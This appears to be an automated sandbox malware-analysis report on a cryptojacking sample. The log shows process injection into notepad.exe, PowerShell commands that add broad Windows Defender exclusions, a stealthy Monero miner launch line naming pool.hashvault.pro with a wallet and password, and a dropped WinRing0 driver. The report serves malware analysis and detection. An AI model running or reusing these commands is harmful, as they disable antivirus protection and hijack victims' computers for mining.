            Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
            Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\notepad.exe C:\Windows/System32\notepad.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:443 --user=46TNT2eMYP5X7V1Kh4SRr8Z7Qb1jsLm74TXDLNkb5M6VgoazSKmN1kydrrcZZ9eqTF7UYDH7NsEbJFLfe7DDkAfK5Nc1VLK --pass=Paizley2019 --cpu-max-threads-hint=20 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=70 --cinit-stealth
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
            Source: C:\Users\user\Desktop\9d2h99wrj.exeProcess created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\Desktop\9d2h99wrj.exe"Jump to behavior
            Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exitJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\notepad.exe C:\Windows/System32\notepad.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:443 --user=46TNT2eMYP5X7V1Kh4SRr8Z7Qb1jsLm74TXDLNkb5M6VgoazSKmN1kydrrcZZ9eqTF7UYDH7NsEbJFLfe7DDkAfK5Nc1VLK --pass=Paizley2019 --cpu-max-threads-hint=20 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=70 --cinit-stealth Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" Jump to behavior
Source: C:\Users\user\Desktop\9d2h99wrj.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\notepad.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\notepad.exe Section loaded: userenv.dll
Source: C:\Windows\System32\notepad.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\notepad.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\notepad.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\notepad.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\notepad.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\notepad.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\notepad.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\notepad.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\notepad.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\notepad.exe Section loaded: napinsp.dll
Source: C:\Windows\System32\notepad.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\notepad.exe Section loaded: wshbth.dll
Source: C:\Windows\System32\notepad.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\notepad.exe Section loaded: winrnr.dll
Source: C:\Windows\System32\notepad.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\notepad.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\notepad.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\notepad.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\notepad.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\conhost.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: 9d2h99wrj.exe Static file information: File size 31161344 > 1048576
Source: 9d2h99wrj.exe Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x1db5e00
            Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: WR64.sys.1.dr

            Persistence and Installation Behavior

Source: C:\Windows\System32\conhost.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys (dropped file)

            Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\notepad.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

Source: C:\Windows\System32\notepad.exe | System information queried: FirmwareTableInformation
Source: notepad.exe, 00000005.00000002.2940501021.0000029C16C9A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCESSHACKER.EXE
Source: conhost.exe, 00000001.00000003.1727491155.00000211D0BCD000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1724397505.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1722733645.00000211D0BCA000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1718862129.00000211D0BC2000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1719595132.00000211D0BC6000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1723937432.00000211D0BC7000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1729241507.00000211D0BC0000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1717134886.00000211D0BCC000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1726405894.00000211D0BCE000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1734910093.00000211D0BC5000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000005.00000002.2939901627.0000000140000000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: [0M%S STOPPING IDLE, SETTING MAX CPU TO: %D%S STARTING IDLE, SETTING MAX CPU TO: %DTASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE%S
Source: notepad.exe, 00000005.00000002.2940501021.0000029C16C9A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCESSHACKER.EXERI.EXERO.
Source: notepad.exe, 00000005.00000002.2940501021.0000029C16C9A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCESSHACKER.EXELOOKUP@&
Source: conhost.exe, 00000001.00000003.1727491155.00000211D0BCD000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1724397505.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1722733645.00000211D0BCA000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1718862129.00000211D0BC2000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1719595132.00000211D0BC6000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1723937432.00000211D0BC7000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1729241507.00000211D0BC0000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1717134886.00000211D0BCC000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1726405894.00000211D0BCE000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1734910093.00000211D0BC5000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000005.00000002.2939901627.0000000140000000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
Source: C:\Windows\System32\conhost.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6001
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3782
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8293
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1285
Source: C:\Windows\System32\conhost.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5500 | Thread sleep count: 6001 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5500 | Thread sleep count: 3782 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5016 | Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7120 | Thread sleep count: 8293 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4888 | Thread sleep count: 1285 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6216 | Thread sleep time: -3689348814741908s >= -30000s
Source: notepad.exe, 00000005.00000002.2940501021.0000029C16C9A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: notepad.exe, 00000005.00000002.2940501021.0000029C16C5E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

            HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\notepad.exe | Network Connect: 192.248.189.11 443
Source: C:\Windows\System32\notepad.exe | Network Connect: 80.240.16.67 443
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
Source: C:\Users\user\Desktop\9d2h99wrj.exe | Memory allocated: C:\Windows\System32\conhost.exe base: 211B2B70000 protect: page execute and read and write
Source: C:\Users\user\Desktop\9d2h99wrj.exe | Thread created: C:\Windows\System32\conhost.exe EIP: B2B70000
Source: C:\Users\user\Desktop\9d2h99wrj.exe | NtCreateThreadEx: Direct from: 0x401A17
Source: C:\Users\user\Desktop\9d2h99wrj.exe | NtWriteVirtualMemory: Direct from: 0x401D57
Source: C:\Users\user\Desktop\9d2h99wrj.exe | NtProtectVirtualMemory: Direct from: 0x401DD7
Source: C:\Users\user\Desktop\9d2h99wrj.exe | NtClose: Direct from: 0x401CD7
Source: C:\Users\user\Desktop\9d2h99wrj.exe | NtAllocateVirtualMemory: Direct from: 0x401D97
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\System32\notepad.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\System32\conhost.exe | Thread register set: target process: 7112
Source: C:\Users\user\Desktop\9d2h99wrj.exe | Memory written: C:\Windows\System32\conhost.exe base: 211B2B70000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\System32\notepad.exe base: 140000000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\System32\notepad.exe base: 140001000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\System32\notepad.exe base: 140367000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\System32\notepad.exe base: 1404A0000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\System32\notepad.exe base: 140753000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\System32\notepad.exe base: 140775000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\System32\notepad.exe base: 140776000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\System32\notepad.exe base: 140777000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\System32\notepad.exe base: 140779000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\System32\notepad.exe base: 14077B000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\System32\notepad.exe base: 14077C000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\System32\notepad.exe base: 14077D000
Source: C:\Windows\System32\conhost.exe | Memory written: C:\Windows\System32\notepad.exe base: C98E169010
Source: C:\Users\user\Desktop\9d2h99wrj.exe | Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\Desktop\9d2h99wrj.exe"
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\notepad.exe C:\Windows/System32\notepad.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:443 --user=46TNT2eMYP5X7V1Kh4SRr8Z7Qb1jsLm74TXDLNkb5M6VgoazSKmN1kydrrcZZ9eqTF7UYDH7NsEbJFLfe7DDkAfK5Nc1VLK --pass=Paizley2019 --cpu-max-threads-hint=20 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=70 --cinit-stealth
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -command "add-mppreference -exclusionpath @(($pwd).path, $env:userprofile,$env:appdata,$env:temp,$env:systemroot,$env:homedrive,$env:systemdrive) -force" & powershell -command "add-mppreference -exclusionextension @('exe','dll') -force" & exit
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\notepad.exe c:\windows/system32\notepad.exe --cinit-find-x -b --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:443 --user=46tnt2emyp5x7v1kh4srr8z7qb1jslm74txdlnkb5m6vgoazskmn1kydrrczz9eqtf7uydh7nsebjflfe7ddkafk5nc1vlk --pass=paizley2019 --cpu-max-threads-hint=20 --cinit-stealth-targets="+iu/trnpctld3p+slbva5u4eyos6bvipemchgqx2wrucnfdomwh6dhl5h5kbqcjp6ycylsfu5lr1mi7nqay56b+5douwurapvcael2sr/n4=" --cinit-idle-wait=5 --cinit-idle-cpu=70 --cinit-stealth
Source: C:\Windows\System32\conhost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\System32\conhost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
